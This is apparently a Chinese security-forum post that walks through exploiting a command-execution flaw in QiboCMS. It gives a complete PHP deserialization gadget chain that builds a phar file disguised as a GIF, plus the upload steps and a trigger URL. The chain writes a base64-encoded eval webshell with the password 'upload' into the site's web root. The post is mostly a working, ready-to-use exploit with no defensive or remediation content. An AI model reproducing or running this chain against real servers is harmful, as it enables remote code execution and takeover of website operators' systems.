如果能贴出代码,跟一下就更好了
[齐博CMS
系统存在命令执行漏洞]
漏洞利用过程:
1 首先爆出网站跟路径:
访问:
/index.php/cms/1
会在debug里看到网站根路径! 如果开了debug的话!
然后根据网站根路径修改poc! 看poc里的注释!
2 利用poc
生成 phar文件
poc
<?php
namespace think\process\pipes {
class Windows {
private $files = [];
public function __construct($files)
{
$this->files = [$files]; //$file => /think/Model的子类new Pivot(); Model是抽象类
}
}
}
namespace think {
abstract class Model{
protected $append = [];
protected $error = null;
public $parent;
function __construct($output, $modelRelation)
{
$this->parent = $output; //$this->parent=> think\console\Output;
$this->append = array("xxx"=>"getError"); //调用getError 返回this->error
$this->error = $modelRelation; // $this->error 要为 relation类的子类,并且也是OnetoOne类的子类==>>HasOne
}
}
}
namespace think\model{
use think\Model;
class Pivot extends Model{
function __construct($output, $modelRelation)
{
parent::__construct($output, $modelRelation);
}
}
}
namespace think\model\relation{
class HasOne extends OneToOne {
}
}
namespace think\model\relation {
abstract class OneToOne
{
protected $selfRelation;
protected $bindAttr = [];
protected $query;
function __construct($query)
{
$this->selfRelation = 0;
$this->query = $query; //$query指向Query
$this->bindAttr = ['xxx'];// $value值,作为call函数引用的第二变量
}
}
}
namespace think\db {
class Query {
protected $model;
function __construct($model)
{
$this->model = $model; //$this->model=> think\console\Output;
}
}
}
namespace think\console{
class Output{
private $handle;
protected $styles;
function __construct($handle)
{
$this->styles = ['getAttr'];
$this->handle =$handle; //$handle->think\session\driver\Memcached
}
}
}
namespace think\session\driver {
class Memcached
{
protected $handler;
function __construct($handle)
{
$this->handler = $handle; //$handle->think\cache\driver\File
}
}
}
namespace think\cache\driver {
class File
{
protected $options=null;
protected $tag;
function __construct(){
$this->options=[
'expire' => 3600,
'cache_subdir' => false,
'prefix' => '',
//'path' => '1111.php',
'path' => 'php://filter/convert.iconv.utf-8.utf-7|convert.base64-decode/resource=aaaPD9waHAgQGV2YWwoJF9QT1NUWyd1cGxvYWQnXSk7ZWNobygidXBsb2FkIik7Pz4/../../../../../../../../../../../phpstudy_pro/WWW/aaa/x1/public/b.php', //win
/*/phpstudy_pro/WWW/aaa/x1/public/b.php /phpstudy_pro/WWW/aaa/x1/是网站根路径,要根据不同服务器进行替换! /public/b.php是webshell的位置 */
'data_compress' => false,
];
$this->tag = 'xxx';
}
}
}
namespace {
$Memcached = new think\session\driver\Memcached(new \think\cache\driver\File());
$Output = new think\console\Output($Memcached);
$model = new think\db\Query($Output);
$HasOne = new think\model\relation\HasOne($model);
$window = new think\process\pipes\Windows(new think\model\Pivot($Output,$HasOne));
// echo urlencode(serialize($window));
$o = $window;
$filename = '2.phar';// 后缀必须为phar,否则程序无法运行
file_exists($filename) ? unlink($filename) : null;
$phar=new Phar($filename);
$phar->startBuffering();
$phar->setStub("GIF89a<?php __HALT_COMPILER(); ?>");
$phar->setMetadata($o);
$phar->addFromString("foo.txt","bar");
$phar->stopBuffering();
}
3 生成phar
文件 将后缀改成gif
!
访问 会员中心:
点击修改个人资料:
用burp抓取 文件上传路径:
5 再访问下面url
写入webshell
:
/index.php/index/Image/headers?url=phar://./public/uploads/pop/20210915/2_20210915195309ac45c.gif
后面是刚刚上传的gif文件!
访问完成后,即可在网站目录下生成webshell
.
6 访问webshell
/public/b.php12ac95f1498ce51d2d96a249c09c1998.php
shell写入成功! 密码是upload
总结
一直挖洞一直爽!
点击收藏 | 2
关注 | 1
打赏